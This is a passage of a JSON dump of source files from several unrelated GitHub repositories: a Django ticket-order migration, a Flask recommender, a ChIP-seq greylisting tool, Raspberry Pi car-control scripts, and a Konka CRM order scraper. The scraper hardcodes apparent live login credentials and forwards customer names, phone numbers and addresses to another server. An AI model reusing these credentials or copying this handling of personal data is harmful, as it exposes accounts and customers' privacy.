"text": "# Generated by Django 3.0.2 on 2020-01-09 20:29\n\nimport datetime\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='BizOrderInfo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('order_sn', models.IntegerField(verbose_name='订单号')),\n ('order_linkman', models.CharField(max_length=32, verbose_name='联系人')),\n ('order_status', models.IntegerField(choices=[(0, '未付款'), (1, '已付款'), (2, '已完成'), (3, '已关闭'), (4, '使用中')], verbose_name='订单状态')),\n ('ct', models.DateTimeField(default=datetime.datetime.now, verbose_name='创建时间')),\n ('order_over_time', models.DateTimeField(blank=True, null=True, verbose_name='订单完成时间')),\n ('order_pay_time', models.DateTimeField(blank=True, null=True, verbose_name='支付时间')),\n ('ut', models.DateTimeField(default=datetime.datetime.now, verbose_name='更新时间')),\n ],\n options={\n 'verbose_name': '订单信息',\n 'verbose_name_plural': '订单信息',\n },\n ),\n migrations.CreateModel(\n name='BizTicket',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=100, verbose_name='票种名')),\n ('ct', models.DateTimeField(default=datetime.datetime.now, verbose_name='创建时间')),\n ],\n options={\n 'verbose_name': '票种信息',\n 'verbose_name_plural': '票种信息',\n },\n ),\n migrations.CreateModel(\n name='BizOrderTicket',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('ticket_start_time', models.DateTimeField(verbose_name='有效期开始时间')),\n ('ticket_end_time', models.DateTimeField(verbose_name='有效期结束时间')),\n ('ticket_status', models.IntegerField(choices=[(0, '未使用'), (1, '已使用'), (2, '已关闭'), (3, '已退款')], verbose_name='单票状态')),\n ('num', models.IntegerField(default=1, verbose_name='数量')),\n ('code', models.CharField(default='', max_length=8, verbose_name='检票码')),\n ('ct', models.DateTimeField(default=datetime.datetime.now, verbose_name='创建时间')),\n ('ut', models.DateTimeField(default=datetime.datetime.now, verbose_name='更新时间')),\n ('order_sn', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tickets.BizOrderInfo')),\n ('ticket_name', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tickets.BizTicket')),\n ],\n options={\n 'verbose_name': '订单票信息',\n 'verbose_name_plural': '订单票信息',\n },\n ),\n ]\n"
}
] | 10 |
jeeva-srinivasan/sentimentHeroku | https://github.com/jeeva-srinivasan/sentimentHeroku | e47213679011856777efd76ac075255c2f391268 | 2c2084dd5b29607b6f1a7af4aa1fce561a3b23e5 | 4f3987f193f975d17de1a47d7ec0402d4c05f731 | refs/heads/main | 2023-04-17T20:10:49.587245 | 2021-04-19T08:38:39 | 2021-04-19T08:38:39 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5875831246376038,
"alphanum_fraction": 0.5898004174232483,
"avg_line_length": 30.214284896850586,
"blob_id": "5c783480a64428b3fd464740603903b6630d0641",
"content_id": "c0c282e2f6c4532383174ee0efaa85b0fe5c96a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 28,
"path": "/app.py",
"repo_name": "jeeva-srinivasan/sentimentHeroku",
"src_encoding": "UTF-8",
"text": "from flask import Flask,render_template,request\r\nimport pickle\r\nfrom predict import predict\r\n\r\n\r\nrecom_df=pickle.load(open(\"recom_engine_cosine.pickle\", \"rb\"))\r\n\r\napp = Flask(__name__)\r\n\r\[email protected](\"/\",methods =[\"POST\",\"GET\"])\r\ndef home():\r\n if request.method == \"POST\":\r\n user_name = request.form.get(\"userName\")\r\n user_name=user_name.lower().strip()\r\n if len(user_name)==0:\r\n return render_template('base.html') + 'Please enter a user name'\r\n if user_name not in recom_df.index:\r\n return render_template('base.html') + 'Please enter a valid user name'\r\n else: \r\n result_df=predict(user_name,recom_df)\r\n return render_template('home.html',predict=result_df.head(5),user=user_name) \r\n \r\n else:\r\n return render_template('base.html') \r\n \r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n"
},
{
"alpha_fraction": 0.6932907104492188,
"alphanum_fraction": 0.7124600410461426,
"avg_line_length": 32.66666793823242,
"blob_id": "368f2a5bc3074805f4e576747afd83b2fb110f2e",
"content_id": "a124ab0c09b09a20e0e85b785710efed6a5690fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 313,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 9,
"path": "/predict.py",
"repo_name": "jeeva-srinivasan/sentimentHeroku",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport time\r\n\r\n\r\ndef predict(user_name,recom_df):\r\n predict_df=pd.read_csv('preprocessing_sample30.csv',index_col='Product')\r\n dataframe_df=predict_df[predict_df.index.isin(recom_df.loc[user_name].sort_values(ascending=False)[0:20].index)]\r\n time.sleep(6)\r\n return dataframe_df \r\n"
}
] | 2 |
roryk/chipseq-greylist | https://github.com/roryk/chipseq-greylist | 73aa34245547b2996582d5266d8ffda303a2e891 | 590090cb9f332035707210b8d14da167588859ad | 246ac345de1d5716b39f1747f2d3544e284dac10 | refs/heads/master | 2022-04-23T12:05:24.584128 | 2020-04-27T16:37:30 | 2020-04-27T16:37:30 | 109,878,527 | 3 | 2 | null | null | null | null | null | [
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6475006341934204,
"avg_line_length": 38.3979606628418,
"blob_id": "e4b662f704ba0509cbaf3fb79a748e6f4e5a752f",
"content_id": "688767de01c127490dca05703f157c476d44d7e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3861,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 98,
"path": "/scripts/chipseq-greylist",
"repo_name": "roryk/chipseq-greylist",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom __future__ import print_function\nimport logging\nimport subprocess\nimport warnings\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom scipy import stats\nfrom statsmodels.discrete.discrete_model import NegativeBinomial as NB\nimport statsmodels.api as sm\nfrom argparse import ArgumentParser\n\nLOGFORMAT = '%(asctime)s:chipseq-greylist:%(levelname)s:%(message)s'\n\ndef load_sambamba_depth(filename):\n return pd.read_csv(filename, sep=\"\\t\")\n\ndef sample_counts(df, n=30000):\n return df.sample(n)[\"readCount\"]\n\ndef estimate_nb_parameters(depth):\n counts = sample_counts(depth)\n x = list(counts)\n y = np.ones(len(counts))\n loglike_method = \"nb1\"\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n fit = NB(x, y, loglike_method=loglike_method).fit(start_params=[0.1, 0.1], disp=0)\n if loglike_method == 'nb1':\n Q = 1\n elif loglike_method == 'nb2':\n Q = 0\n mu = np.exp(fit.params[0])\n alpha = fit.params[1]\n size = 1. / alpha * mu**Q\n prob = size / (size + mu)\n return {\"size\": size, \"prob\": prob}\n\ndef estimate_threshold(depth, nreps=100, cutoff=0.99):\n logging.info(\"Estimating greylisting threshold using %d bootstrap samples.\" % nreps)\n parameters = [estimate_nb_parameters(depth) for x in range(nreps)]\n sizes = [x[\"size\"] for x in parameters]\n probs = [x[\"prob\"] for x in parameters]\n size_sd = np.std(sizes)\n size_mean = np.mean(sizes)\n prob_sd = np.std(probs)\n prob_mean = np.mean(probs)\n dist = stats.nbinom(size_mean, prob_mean)\n threshold = dist.ppf(0.99)\n return {\"size_sd\": size_sd,\n \"size_mean\": size_mean,\n \"prob_sd\": prob_sd,\n \"prob_mean\": prob_mean,\n \"threshold\": threshold}\n\ndef run_sambamba_depth(bamfile, outdir):\n logging.info(\"Calculating depth over genomic regions of %s with sambamba.\"\n % os.path.abspath(bamfile))\n cmd = (\"sambamba depth window --window-size=1024 --overlap=512 \"\n \"{bamfile} > {outfile}\")\n bambase = os.path.splitext(os.path.basename(bamfile))[0]\n outfile = os.path.join(outdir, bambase + \"-greydepth.tsv\")\n if os.path.exists(outfile):\n return outfile\n subprocess.check_call(cmd.format(**locals()), shell=True)\n return outfile\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"bamfile\")\n parser.add_argument(\"--cutoff\", default=0.99)\n parser.add_argument(\"--bootstraps\", default=100, type=int)\n parser.add_argument(\"--quiet\", default=False, action='store_true')\n parser.add_argument(\"--outdir\", default=\".\")\n args = parser.parse_args()\n if not args.quiet:\n logging.basicConfig(level=logging.INFO, format=LOGFORMAT)\n\n logging.info(\"Running greylisting on %s.\" % args.bamfile)\n depthfile = run_sambamba_depth(args.bamfile, args.outdir)\n depth = load_sambamba_depth(depthfile)\n threshold = estimate_threshold(depth, nreps=args.bootstraps, cutoff=args.cutoff)\n\n bambase = os.path.splitext(os.path.basename(args.bamfile))[0]\n statsfile = os.path.join(args.outdir, bambase + \"-greystats.csv\")\n with open(statsfile, \"w\") as out_file:\n print(\",\".join([\"stat\", \"value\"]), file=out_file)\n print(\",\".join([\"size_sd\", str(threshold[\"size_sd\"])]), file=out_file)\n print(\",\".join([\"size_mean\", str(threshold[\"size_mean\"])]), file=out_file)\n print(\",\".join([\"prob_sd\", str(threshold[\"prob_sd\"])]), file=out_file)\n print(\",\".join([\"prob_mean\", str(threshold[\"prob_mean\"])]), file=out_file)\n print(\",\".join([\"threshold\", str(threshold[\"threshold\"])]), file=out_file)\n\n bedfile = os.path.join(args.outdir, bambase + \"-grey.bed\")\n depth = depth[depth['readCount'] > threshold[\"threshold\"]].iloc[:, range(4)]\n depth.to_csv(bedfile, sep=\"\\t\", header=False, index=False)\n"
},
{
"alpha_fraction": 0.6611226797103882,
"alphanum_fraction": 0.6673596501350403,
"avg_line_length": 27.294116973876953,
"blob_id": "d7845256357431ab0fc5373e2b61f47f9b7ac1f0",
"content_id": "55192ce4361e331175455edacbddb8c502832719",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 17,
"path": "/setup.py",
"repo_name": "roryk/chipseq-greylist",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom setuptools import setup\nversion = \"1.0.2\"\n\ninstall_requires = [\"pandas\", \"numpy\", \"scipy\", \"statsmodels\"] \n\nscripts = ['scripts/chipseq-greylist']\n\nsetup(name=\"chipseq-greylist\",\n version=version,\n author=\"Rory Kirchner\",\n author_email=\"[email protected]\",\n description=\"python implementation of GreyListChIP\",\n license=\"MIT\",\n url=\"https://github.com/roryk/chipesq-greylist\",\n scripts=scripts,\n install_requires=install_requires)\n"
},
{
"alpha_fraction": 0.6030150651931763,
"alphanum_fraction": 0.6834170818328857,
"avg_line_length": 18.899999618530273,
"blob_id": "c50f875b5576708cf870c4e31d7996f634843804",
"content_id": "e4564b040a00c6d2a07a370ca2c1c97e76191f04",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 199,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 10,
"path": "/HISTORY.md",
"repo_name": "roryk/chipseq-greylist",
"src_encoding": "UTF-8",
"text": "## 1.0.2 (4/27/2020)\n- Fix for pandas `.ix` deprecation.\n\n## 1.0.1\n- Remove .py extension from script.\n- Silence statmodels fitting progress messages.\n- Cleanup logging.\n\n## 1.0.0\n- Initial release.\n"
},
{
"alpha_fraction": 0.8018702268600464,
"alphanum_fraction": 0.8018702268600464,
"avg_line_length": 42.871795654296875,
"blob_id": "8b278297b8facea413a68e9e5ed617716e8ff10b",
"content_id": "b41a08113c3fc9b3119723c5a656de22f99b998f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1711,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 39,
"path": "/README.md",
"repo_name": "roryk/chipseq-greylist",
"src_encoding": "UTF-8",
"text": "Python implementation of the GreyListChIP Bioconductor package.\n\nFor a ChIP-seq experiment with a paired input and ChIP sample, this will\ncalculate a greylist for peaks from the input for that particular pair. These\nare questionable peaks for this particular input-ChIP pair.\n\nThe reason for doing this is that peak callers can sometimes have trouble in\nhigh depth input regions even though the caller adjusts for the reads in the\ninput lane. It is standard practice to use the ENCODE blacklist regions for\ncommonly problematic regions but there can be additional, sample-specific high\ndepth input regions that are not covered by the blacklist regions. This flags\npeaks that falls into those sample-specific high input regions as questionable.\n\nThis implementation improves on the R implementation by not needing a separate\ngenome file and being easily runnable on the command line. It contains no\noriginal ideas. \n\nhttps://bioconductor.org/packages/release/bioc/html/GreyListChIP.html is\nthe source of the idea and the algorithm.\n\n## usage\nRun chipseq-greylist on your **input BAM** file for each input-ChIP pair:\n\n```bash\nchipseq-greylist bamfile\n```\n\nthis will produce a few files:\n\n* **bamfile-input-greystats.csv**: bootstrapped negative binomial parameters and estimated threshold\n* **bamfile-input-greydepth.tsv**: sambamba windowed depth\n* **bamfile-input-grey.bed**: BED file of greylist regions exceeding coverage threshold in the input file\n\nYou can now filter out/annotate peaks falling in the greylist regions by interesecting the peaks with\nthe greylist file. For example:\n\n```bash\nbedtools intersect -wao -a bamfile-peaks.bed -b bamfile-input-grey.bed > bamfile-peaks-greylist-annotated.bed\n```\n"
}
] | 4 |
web3devguy/hackernews | https://github.com/web3devguy/hackernews | 8d3f8d4985dfecf226c401eccfead0a89edf85db | d5beb8dbed04c610331bd62c92dee2e026a335d4 | 90bac4933617a689c7460a5da9d0f6ae6365fd0f | refs/heads/master | 2022-02-28T07:10:37.145666 | 2019-10-14T03:14:45 | 2019-10-14T03:14:45 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7634408473968506,
"alphanum_fraction": 0.7634408473968506,
"avg_line_length": 17.600000381469727,
"blob_id": "fb5969922be088c083f90297d9b989f67c1f4546",
"content_id": "b992642cb2fd328b9a132483e2a6b8f8d458b694",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 93,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 5,
"path": "/hackerProject/hackerApp/apps.py",
"repo_name": "web3devguy/hackernews",
"src_encoding": "UTF-8",
"text": "from django.apps import AppConfig\n\n\nclass HackerappConfig(AppConfig):\n name = 'hackerApp'\n"
}
] | 1 |
LLGJUN/control_pi_car | https://github.com/LLGJUN/control_pi_car | 2b41955c5456263c708b0e8156dc40683881cc82 | 18b65702a54bc2874226ed8753c2fd2147d02611 | 0b256afeb786a2640adcee83128059e10eecf6d1 | refs/heads/master | 2020-03-19T19:39:24.625341 | 2018-06-11T03:07:58 | 2018-06-11T03:07:58 | 136,868,132 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5974576473236084,
"alphanum_fraction": 0.6115819215774536,
"avg_line_length": 26.784313201904297,
"blob_id": "f8860a9423e3da4eac0e04526c43f6244df0c067",
"content_id": "c3dc0183ca0cf47de60d9b23e9eb898fc79d9751",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1474,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 51,
"path": "/send_message_to_car.py",
"repo_name": "LLGJUN/control_pi_car",
"src_encoding": "UTF-8",
"text": "import socket\nimport pygame\nfrom pygame.locals import *\nimport time\n\n\nWIDTH=640\nHEIGTH=480\npygame.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGTH))\npygame.display.set_caption(\"web cam\")\npygame.display.flip()\nsvrsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsvrsocket.bind(('', 2222))\nsvrsocket.listen(1)\nprint('正在侦听客户端连接')\nclient,addr=svrsocket.accept()\nprint('接收到一个新连接')\nclock = pygame.time.Clock() # 计算帧速\nwhile 1:\n clock.tick()\n pygame.display.update()\n # 绘制按键执行代码\n key_pressed = pygame.key.get_pressed()\n if key_pressed[K_w] or key_pressed[K_UP]:\n time.sleep(0.2)\n if key_pressed[K_w] or key_pressed[K_UP]:\n print('you press up ')\n client.send(b'up')\n\n if key_pressed[K_s] or key_pressed[K_DOWN]:\n time.sleep(0.2)\n if key_pressed[K_s] or key_pressed[K_DOWN]:\n print('you press down ')\n client.send(b'down')\n\n if key_pressed[K_a] or key_pressed[K_LEFT]:\n time.sleep(0.2)\n if key_pressed[K_s] or key_pressed[K_LEFT]:\n print('you press left ')\n client.send(b'left')\n\n if key_pressed[K_d] or key_pressed[K_RIGHT]:\n time.sleep(0.2)\n if key_pressed[K_d] or key_pressed[K_RIGHT]:\n print('you press right ')\n client.send(b'right')\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()"
},
{
"alpha_fraction": 0.6311154365539551,
"alphanum_fraction": 0.640574038028717,
"avg_line_length": 27.924528121948242,
"blob_id": "8dbe2c2d98f73f4c24524361b8f41bb8294a1adc",
"content_id": "618036443e453d5c1193101c84fe73b156639e51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3354,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 106,
"path": "/contorl_car.py",
"repo_name": "LLGJUN/control_pi_car",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*-coding: utf-8 -*-\n\nfrom socket import *\nfrom datetime import *\nimport time\nimport binascii\nimport threading\nimport pygame\n\nWIDTH=160\nHEIGTH=120\n\npic_width=160\npic_height=120\n\n# 线程1:用来接收客户端发送过来的数据\nclass myThread_receive_data_from_client(threading.Thread): # 继承父类threading.Thread\n def __init__(self, threadID, clientsocket):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.clientsocket = clientsocket\n\n def run(self): # 把要执行的代码写到run函数里面 线程在创建后会直接运行run函数\n print(\"Starting \" + self.threadID)\n receive_data(self.clientsocket)\n print(\"Exiting \" + self.threadID)\n\ndef recvall(sock,count):\n buf=b''\n while count:\n newbuf=sock.recv(count)\n if not newbuf:\n return None\n buf +=newbuf\n count -= len(newbuf)\n return buf\n\ndef receive_data(client_socket): # 接收到五条数据后推出\n pygame.init()\n screen = pygame.display.set_mode((WIDTH, HEIGTH))\n pygame.display.set_caption(\"web cam\")\n pygame.display.flip()\n clock = pygame.time.Clock() # 计算帧速\n while 1:\n data = recvall(client_socket, pic_width * pic_height * 3)\n # print(len(data))\n camshot = pygame.image.frombuffer(data, (pic_width, pic_height), \"RGB\")\n img = pygame.transform.scale(camshot, (WIDTH, HEIGTH))\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n screen.blit(img, (0, 0))\n pygame.display.update()\n print(clock.get_fps()) # 在终端打印帧速\n clock.tick()\n\n\n# 线程2:用来发送数据到客户端\nclass myThread_send_data_from_client(threading.Thread): # 继承父类threading.Thread\n def __init__(self, threadID, clientsocket, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.clientsocket = clientsocket\n self.counter = counter\n\n def run(self): # 把要执行的代码写到run函数里面 线程在创建后会直接运行run函数\n print(\"Starting \" + self.threadID)\n send_data(self.clientsocket, self.counter)\n print(\"Exiting \" + self.threadID)\n\n\ndef send_data(mysocket, counter): # 接收到五条数据后推出\n while counter > 0:\n delta = input('请输入舵机角度')\n # mysocket.send('+++message:from server+++')\n mysocket.send(str(delta))\n print('send ok')\n counter -= 1\n mysocket.close()\n\n\nif __name__ == '__main__':\n server = socket(AF_INET, SOCK_STREAM)\n server.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n server.bind(('', 2222))\n server.listen(5)\n print(\"Waiting for connection...\")\n client_socket, client = server.accept()\n\n myThread_receive = myThread_receive_data_from_client('receive_thread', client_socket)\n myThread_send = myThread_send_data_from_client('send_thread', client_socket, 20)\n myThread_receive.setDaemon(True)\n myThread_receive.start()\n myThread_send.setDaemon(True)\n myThread_send.start()\n\n threads = []\n # 添加线程到线程列表\n threads.append(myThread_receive)\n threads.append(myThread_send)\n\n # 等待所有线程完成\n for t in threads:\n t.join()\n print(\"Exiting Main Thread\")\n server.close()\n"
},
{
"alpha_fraction": 0.6446428298950195,
"alphanum_fraction": 0.6678571701049805,
"avg_line_length": 26.341463088989258,
"blob_id": "5ea2f815fadf8f0dabd621c3f88c3e2bb7af0926",
"content_id": "3befeb0575fc734c4ffec94a80860a7c94d9dfdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 41,
"path": "/showpic.py",
"repo_name": "LLGJUN/control_pi_car",
"src_encoding": "UTF-8",
"text": "import socket\nimport os, sys, pygame\n\nWIDTH=160\nHEIGTH=120\n\npic_width=160\npic_height=120\n\ndef recvall(sock,count):\n buf=b''\n while count:\n newbuf=sock.recv(count)\n if not newbuf:\n return None\n buf +=newbuf\n count -= len(newbuf)\n return buf\n\npygame.init()\nscreen = pygame.display.set_mode((WIDTH, HEIGTH))\npygame.display.set_caption(\"web cam\")\npygame.display.flip()\n# svrsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #UDP传输\nsvrsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsvrsocket.bind((\"\", 1234))\nsvrsocket.listen(1)\nclient,addr=svrsocket.accept()\nclock = pygame.time.Clock() # 计算帧速\nwhile 1:\n # data, address = svrsocket.recvfrom(80000)\n data=recvall(client,pic_width*pic_height*3)\n # print(len(data))\n camshot = pygame.image.frombuffer(data, (pic_width, pic_height), \"RGB\")\n img=pygame.transform.scale(camshot, (WIDTH, HEIGTH))\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n screen.blit(img , (0, 0))\n pygame.display.update()\n print(clock.get_fps()) # 在终端打印帧速\n clock.tick()"
}
] | 3 |
chengyan1984/cdk-gui | https://github.com/chengyan1984/cdk-gui | 7deab8bb31c5961e84154da413be51507f653129 | dc79b3ef2995ce394e19235a005b48b8db84d799 | 65d4eec6b9926cffc3e1aa374453e5e968087746 | refs/heads/master | 2023-01-12T04:19:19.487013 | 2020-11-20T03:48:10 | 2020-11-20T03:48:10 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5533967018127441,
"alphanum_fraction": 0.5770812630653381,
"avg_line_length": 51.61940383911133,
"blob_id": "086816420b7a3cf111f6a9563c9a6b7cb7215989",
"content_id": "c37ae207cea64334661676482c8819af3758a187",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7139,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 134,
"path": "/ConkaUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
"text": "import json\nfrom urllib.parse import urlparse\n\nimport requests\n\n\nclass ConkaUtil:\n def __init__(self, username, passwd, adminid='15870', factoryid='1', baseurl='https://crm.konka.com',\n bjdomain='http://north.bangjia.me'):\n parsed_uri = urlparse(baseurl)\n self.host = parsed_uri.netloc\n self.username = username\n self.passwd = passwd\n self.baseurl = baseurl\n self.adminid = adminid\n self.factoryid = factoryid\n self.bjdomain = bjdomain\n self.mainurl = self.baseurl + '/admin/page!main.action'\n self.searchurl = self.baseurl + '/afterservice/afterservice!api.action'\n self.session = requests.Session()\n self.agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \\\n 'Chrome/81.0.4044.113 Safari/537.36'\n self.datasuccess = {'code': 1, 'msg': '抓单成功', 'element': ''}\n self.datafail = {'code': 0, 'msg': '抓单失败,请确认账号密码是否正确'}\n self.headers = {'Content-Type': 'application/json;charset=UTF-8',\n 'User-Agent': self.agent,\n 'Upgrade-Insecure-Requests': '1', 'Host': self.host, 'Origin': self.baseurl,\n 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\n 'Accept': 'application/json, text/plain, */*'}\n\n def loadMain(self):\n loginurl = self.baseurl + \"/services/organization/api/authenticate\"\n data = {\"username\": self.username, \"password\": self.passwd, \"rememberMe\": True}\n self.headers['Referer'] = self.baseurl\n response = self.session.post(loginurl, headers=self.headers, data=json.dumps(data))\n response.encoding = 'utf-8'\n author = response.headers['Authorization']\n self.headers['Authorization'] = author\n # print(\"loadMain author={}\".format(author))\n return self.getUserInfo()\n\n def getUserInfo(self):\n loginurl = self.baseurl + \"/services/organization/api/current/dept/info\"\n self.headers['Referer'] = self.baseurl\n response = self.session.get(loginurl, headers=self.headers)\n response.encoding = 'utf-8'\n return self.login()\n\n def login(self):\n loginurl = self.baseurl + \"/services/organization/api/ourmUser/login\"\n self.headers['Referer'] = self.baseurl\n response = self.session.get(loginurl, headers=self.headers)\n response.encoding = 'utf-8'\n return self.getOrgInfo()\n\n def getOrgInfo(self):\n loginurl = self.baseurl + \"/services/organization/api/ourmUser/list\"\n self.headers['Referer'] = self.baseurl\n response = self.session.get(loginurl, headers=self.headers)\n response.encoding = 'utf-8'\n params = [\n # {\"betweenMap\": {}, \"dto\": {\"status\": \"DISTRIBUTING\"}, \"extMap\": {}, \"searchMap\": {}},\n {\"dto\": {\"status\": \"ACCEPTED\"}, \"pageIndex\": 1, \"pageSize\": 50},\n {\"dto\": {\"status\": \"RESERVATION\"}, \"pageIndex\": 1, \"pageSize\": 50}]\n orderlist = []\n for param in params:\n orders = self.loadOrders(param)\n if orders and len(orders) > 0:\n orderlist += orders\n print(\"orderlist count={} orderlist={}\".format(len(orderlist), orderlist))\n try:\n data = {\"data\": json.dumps(orderlist)}\n requests.post(self.bjdomain + \"/Api/Climborder/addorder\", data=data)\n except Exception as e:\n print(\"addorder failed:\", e)\n return self.datafail\n return self.datasuccess\n\n def loadOrders(self, param=None):\n orderurl = self.baseurl + \"/services/distributeproce/api/repair/acl/_search/page\"\n # RESERVATION 待确认 ACCEPTED 待预约 DISTRIBUTING 待接单 VISIT 待完工\n # 维修任务\n # {\"betweenMap\":{},\"dto\":{\"type\":\"REPAIR_ACL_OWN_NOT\"},\"searchMap\":{\"status\":{\"opt\":\"IN\",\"value\":\"SUBMIT,ACCEPTED,RESERVATION,VISIT\"}},\"pageIndex\": 1,\"pageSize\":10}\n # params = {\"betweenMap\": {}, \"dto\": {\"status\": \"DISTRIBUTING\"}, \"extMap\": {}, \"searchMap\": {}, \"pageIndex\": 1, \"pageSize\": 50}\n # params = {\"dto\": {\"status\": \"ACCEPTED\"}, \"pageIndex\": 1, \"pageSize\": 50}\n self.headers['Request-Source'] = 'PC'\n self.headers['Sec-Fetch-Dest'] = 'empty'\n response = self.session.post(orderurl, data=json.dumps(param), headers=self.headers)\n response.encoding = 'utf-8'\n datas = json.loads(response.text)\n # print(\"====================================loadOrders\")\n # print(params)\n # print(response.text)\n if datas['status'] == 200:\n try:\n return self.parseOrders(datas)\n except Exception as e:\n print(\"addorder failed:\", e)\n return []\n\n def parseOrders(self, datas):\n total_num = datas['data']['totalElements']\n order_list = []\n for order_key in datas['data']['content']:\n # repairSubOrderNum :\"PD2020042801002-01\" repairNum :\"PD2020042801002\" reportNum :BDX2020042800717\n repairtime = order_key['reservationDate'] if not order_key['reservationFirstTime'] else order_key[\n 'reservationFirstTime'] if not order_key['reservationSuccessTime'] else order_key[\n 'reservationSuccessTime']\n if repairtime:\n repairtime = repairtime.replace(\"T\", ' ')\n orderno = order_key['repairSubOrderNum'] if order_key['repairSubOrderNum'] else order_key['reportNum']\n order_info = {'factorynumber': orderno, 'ordername': order_key['serviceTypeName'],\n 'username': order_key['purchaserName'], 'mobile': order_key['purchaserPhone'],\n 'orderstatus': order_key['statusName'], 'originname': '康佳系统',\n 'mastername': order_key['repairAclName'],\n 'machinetype': order_key['seriesName'], 'machinebrand': '康佳', 'sn': '',\n 'companyid': self.factoryid, 'adminid': self.adminid,\n 'address': str(order_key['purchaserReportAddress']),\n 'province': order_key['provinceName'], 'city': order_key['cityName'],\n 'county': order_key['regionName'], 'town': order_key['countyName'],\n 'ordertime': order_key['createdDate'], 'repairtime': repairtime,\n 'note': str(order_key['brandName']) + str(order_key['serviceNatureName']),\n 'description': order_key['userFaultDesc'],\n }\n order_list.append(order_info)\n return order_list\n\n\nif __name__ == '__main__':\n util = ConkaUtil('K608069', 'Crm@20200401', adminid='15870', factoryid='1')\n # util = ConkaUtil('K608475', 'Kuser6646!', adminid='20699', factoryid='1')\n # util = ConkaUtil('K608069', 'Crm@20200401', adminid='24', factoryid='1')\n print(util.loadMain())\n"
},
{
"alpha_fraction": 0.5429661273956299,
"alphanum_fraction": 0.5543339848518372,
"avg_line_length": 46.08098602294922,
"blob_id": "ddb8c75c444ae783126c3fe9eb89e1a9c838389d",
"content_id": "c4fd61d3edadaeb591d4e45b78c13b013f3b2366",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13631,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 284,
"path": "/SuningUtil.py",
"repo_name": "chengyan1984/cdk-gui",
"src_encoding": "UTF-8",
